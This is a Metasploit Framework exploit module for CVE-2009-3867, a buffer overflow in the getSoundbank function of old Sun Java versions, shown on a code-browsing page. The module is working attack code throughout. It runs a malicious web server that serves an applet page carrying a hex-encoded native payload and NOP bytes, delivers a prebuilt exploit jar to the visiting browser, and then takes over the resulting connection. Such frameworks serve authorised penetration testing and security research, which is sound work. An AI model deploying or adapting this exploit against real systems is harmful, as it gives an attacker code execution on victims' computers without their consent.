Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/java_getsoundbank_bof.rb
19534 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  #

10
  # This module acts as an HTTP server

11
  #

12
  include Msf::Exploit::Remote::HttpServer::HTML

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Sun Java JRE getSoundbank file:// URI Buffer Overflow',

19
        'Description' => %q{

20
          This module exploits a flaw in the getSoundbank function in the Sun JVM.

21


22
          The payload is serialized and passed to the applet via PARAM tags. It must be

23
          a native payload.

24


25
          The effected Java versions are JDK and JRE 6 Update 16 and earlier,

26
          JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and

27
          earlier, and SDK and JRE 1.3.1_26 and earlier.

28


29
          NOTE: Although all of the above versions are reportedly vulnerable, only

30
          1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.

31
        },

32
        'License' => MSF_LICENSE,

33
        'Author' => [

34
          'kf', # Original PoC/exploit

35
          'jduck' # metasploit version

36
        ],

37
        'References' => [

38
          [ 'CVE', '2009-3867' ],

39
          [ 'OSVDB', '59711' ],

40
          [ 'BID', '36881' ],

41
          [ 'ZDI', '09-076' ]

42
        ],

43
        'Payload' => {

44
          'Space' => 1024,

45
          'BadChars' => '',

46
          'DisableNops' => true,

47
        },

48
        'Platform' => %w{win osx},

49
        'Targets' => [

50
=begin

51


52
No automatic targetting for now ...

53


54
          [ 'J2SE 1.6_16 Automatic',

55
            {

56
              'Platform' => %w{ linux osx win },

57
              'Arch' => [ARCH_X86, ARCH_PPC]

58
            }

59
          ],

60
=end

61
          [

62
            'J2SE 1.6_16 on Windows x86',

63
            {

64
              'Platform' => 'win',

65
              'Arch' => ARCH_X86

66
            }

67
          ],

68
          [

69
            'J2SE 1.6_16 on Mac OS X PPC',

70
            {

71
              'Platform' => 'osx',

72
              'Arch' => ARCH_PPC,

73
            }

74
          ],

75
          [

76
            'J2SE 1.6_16 on Mac OS X x86',

77
            {

78
              'Platform' => 'osx',

79
              'Arch' => ARCH_X86,

80
            }

81
          ],

82
        ],

83
        'DefaultTarget' => 0,

84
        'DisclosureDate' => '2009-11-04',

85
        'Notes' => {

86
          'Reliability' => UNKNOWN_RELIABILITY,

87
          'Stability' => UNKNOWN_STABILITY,

88
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

89
        }

90
      )

91
    )

92
  end

93


94
  def exploit

95
    # load the static jar

96
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2009-3867.jar")

97
    fd = File.open(path, "rb")

98
    @jar_data = fd.read(fd.stat.size)

99
    fd.close

100


101
    super

102
  end

103


104
  def on_request_uri(cli, req)

105
    # Create a cached mapping between IP and detected target

106
    @targetcache ||= {}

107
    @targetcache[cli.peerhost] ||= {}

108
    @targetcache[cli.peerhost][:update] = Time.now.to_i

109


110
    if (target.name =~ /Automatic/)

111
      case req.headers['User-Agent']

112
      when /Windows/i

113
        print_status("Choosing a Windows target")

114
        @targetcache[cli.peerhost][:target] = self.targets[1]

115
      when /PPC Mac OS X/i

116
        print_status("Choosing a Mac OS X PPC target")

117
        @targetcache[cli.peerhost][:target] = self.targets[2]

118
      when /Intel Mac OS X/i

119
        print_status("Choosing a Mac OS X x86 target")

120
        @targetcache[cli.peerhost][:target] = self.targets[3]

121
      else

122
        print_status("Unknown target for: #{req.headers['User-Agent']}")

123
      end

124
    end

125


126
    # Clean the cache

127
    rmq = []

128
    @targetcache.each_key do |addr|

129
      if (Time.now.to_i > @targetcache[addr][:update] + 60)

130
        rmq.push addr

131
      end

132
    end

133


134
    rmq.each { |addr| @targetcache.delete(addr) }

135


136
    # Request processing

137
    if (not req.uri.match(/\.jar$/i))

138


139
      # Redirect to the base directory so the applet code loads...

140
      if (not req.uri.match(/\/$/))

141
        print_status("Sending redirect so path ends with / ...")

142
        send_redirect(cli, get_resource() + '/', '')

143
        return

144
      end

145


146
      # Display the applet loading HTML

147
      print_status("Sending HTML")

148
      send_response_html(cli, generate_html(payload.encoded),

149
                         {

150
                           'Content-Type' => 'text/html',

151
                           'Pragma' => 'no-cache'

152
                         })

153
      return

154
    end

155


156
    # Send the actual applet over

157
    print_status("Sending applet")

158
    send_response(cli, generate_applet(cli, req),

159
                  {

160
                    'Content-Type' => 'application/octet-stream',

161
                    'Pragma' => 'no-cache'

162
                  })

163


164
    # Handle the payload

165
    handler(cli)

166
  end

167


168
  def generate_html(pl)

169
    html = <<~EOF

170
      <html>

171
      <head>

172
      <!-- <meta http-equiv=refresh content=10 /> -->

173
      </head>

174
      <body>

175
      <applet width='100%' height='100%' code='AppletX' archive='JARNAME'>

176
      <param name='sc' value='SCODE' />

177
      <param name='np' value='NOPS' />

178
      </applet>

179
      </body>

180
      </html>

181
    EOF

182


183
    # finalize the html

184
    jar_name = rand_text_alphanumeric(32) + '.jar'

185
    html.gsub!(/JARNAME/, jar_name)

186


187
    # add payload

188
    debug_payload = false

189
    pload = ""

190
    pload << "\xcc" if debug_payload

191
    pload << pl

192
    if ((pload.length % 4) > 0)

193
      pload << rand_text((4 - (pload.length % 4)))

194
    end

195
    if debug_payload

196
      print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))

197
    end

198
    html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))

199


200
    # add nops

201
    nops = "\x90\x90\x90\x90"

202
    html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))

203
    # print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))

204


205
    return html

206
  end

207


208
  def generate_applet(cli, req)

209
    this_target = nil

210
    if (target.name =~ /Automatic/)

211
      if (@targetcache[cli.peerhost][:target])

212
        this_target = @targetcache[cli.peerhost][:target]

213
      else

214
        return ''

215
      end

216
    else

217
      this_target = target

218
    end

219


220
    return @jar_data

221
  end

222
end

223


224